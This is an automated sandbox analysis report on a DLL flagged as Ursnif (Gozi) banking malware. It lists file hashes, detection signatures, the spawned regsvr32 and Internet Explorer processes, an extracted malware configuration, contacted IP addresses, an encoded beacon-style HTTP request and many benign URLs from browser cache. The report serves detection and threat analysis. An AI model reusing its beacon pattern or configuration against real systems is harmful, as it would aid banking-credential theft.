Play interactive tour

Edit tour

Analysis Report c0nnect1on.dll

Overview

General Information

Sample Name:	c0nnect1on.dll
Analysis ID:	321561
MD5:	20a56ccc52baa83bb0dcf3ef56035f6e
SHA1:	9c676a87f45a729814803eba55afde7653f8f1d0
SHA256:	e33157d0b5973fb880934006b1427f5ad53ae3f471e81a9a8460772d7f5b3657
Tags:	dllgoziisfbtributariaursnif
Most interesting Screenshot:

Detection

Ursnif

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Creates a COM Internet Explorer object

Machine Learning detection for sample

Writes or reads registry keys via WMI

Writes registry values via WMI

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 7164 cmdline: loaddll32.exe 'C:\Users\user\Desktop\c0nnect1on.dll' MD5: 62442CB29236B024E992A556DA72B97A)

regsvr32.exe (PID: 1872 cmdline: regsvr32.exe /s C:\Users\user\Desktop\c0nnect1on.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

cmd.exe (PID: 6320 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

iexplore.exe (PID: 4588 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4668 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3000 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5672 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4588 CREDAT:82956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "version": "250162", "uptime": "199ceL}", "crc": "1", "id": "7240", "user": "ef15d01308f8d2d8cdc8873a6c1b6097", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.385630027.0000000004BD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.601348245.0000000004BD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.385676545.0000000004BD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.385708605.0000000004BD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.385696789.0000000004BD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.385602285.0000000004BD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.385720393.0000000004BD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.385552815.0000000004BD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.385580205.0000000004BD8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 1872	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: regsvr32.exe.1872.1.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "version": "250162", "uptime": "199ceL}", "crc": "1", "id": "7240", "user": "ef15d01308f8d2d8cdc8873a6c1b6097", "soft": "3"}

Multi AV Scanner detection for submitted file

Show sources

Source: c0nnect1on.dll	Virustotal: Detection: 20%			Perma Link
Source: c0nnect1on.dll	ReversingLabs: Detection: 10%

Machine Learning detection for sample

Show sources

Source: c0nnect1on.dll

Joe Sandbox ML: detected

Source: 1.2.regsvr32.exe.510000.1.unpack

Avira: Label: TR/Crypt.XPACK.Gen8

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00D9523B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

1_2_00D9523B

Networking:

Creates a COM Internet Explorer object

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Source: Joe Sandbox View	IP Address: 87.248.118.22 87.248.118.22
Source: Joe Sandbox View	IP Address: 87.248.118.22 87.248.118.22
Source: Joe Sandbox View	IP Address: 151.101.1.44 151.101.1.44

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic

HTTP traffic detected: GET /images/EaRh3KPU8Z7coy/kY49BSPFz6LoeX84d6Nmk/tmvkFayWIoRWEt0L/B4ps7khO_2F9SEG/f9boHEnizBFmGTNyDb/Kge3D9NUI/7_2Fw5RP2M_2BeX2COQk/s_2FybxZe2CPpDEkVp2/8ynz_2BTLv3U3kmn5mpdiz/j3XtWX.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive

Source: de-ch[1].htm.4.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: de-ch[1].htm.4.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.4.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: auction[1].htm.4.dr	String found in binary or memory: http://popup.taboola.com/german
Source: ~DF61CB16FB817E4404.TMP.3.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.4.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://bealion.com/politica-de-cookies
Source: auction[1].htm.4.dr	String found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=mNNGG.8GIS8bXOIK1_6XOep5pccJpAwYCgwLRODglrB_LQvU
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: auction[1].htm.4.dr	String found in binary or memory: https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://channelpilot.co.uk/privacy-policy
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: ~DF61CB16FB817E4404.TMP.3.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: ~DF61CB16FB817E4404.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DF61CB16FB817E4404.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://docs.prebid.org/privacy.html
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: auction[1].htm.4.dr	String found in binary or memory: https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=Q9naAlEGIS.1JJYPdMI_yhrAE6dOAkiyv1mspKhU5S1V
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://listonic.com/privacy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1606122071&rver
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1606122071&rver=7.0.6730.0&am
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1606122072&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1606122071&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: auction[1].htm.4.dr	String found in binary or memory: https://policies.oath.com/us/en/oath/privacy/index.html
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://quantyoo.de/datenschutz
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://related.hu/adatkezeles/
Source: ~DF61CB16FB817E4404.TMP.3.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: auction[1].htm.4.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-verticals-shoppinghub
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: auction[1].htm.4.dr	String found in binary or memory: https://srtb.msn.com:443/notify/viewedg?rid=a16315818c9f4b41b00a4c8209d92d24&r=infopane&i=3&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr, imagestore.dat.3.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1b6vzA.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bfBvf.img?h=333&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bgFkw.img?h=166&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bgaKd.img?h=166&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.admo.tv/en/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=mestripe
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.blackfridaydeals.ch/?utm_source=ms&utm_campaign=topnav
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-gross
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.blackfridaydeals.ch/neuste-angebote?utm_source=ms&utm_campaign=shop-trends
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.brightcom.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.gadsme.com/privacy-policy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DF61CB16FB817E4404.TMP.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/19-j%c3%a4hriger-lernfahrer-stirbt-nach-unfall-mit-t%c3%b6ff/ar
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/der-fc-z%c3%bcrich-punktet-weiter-doch-etwas-fehlt/ar-BB1bfNaZ?
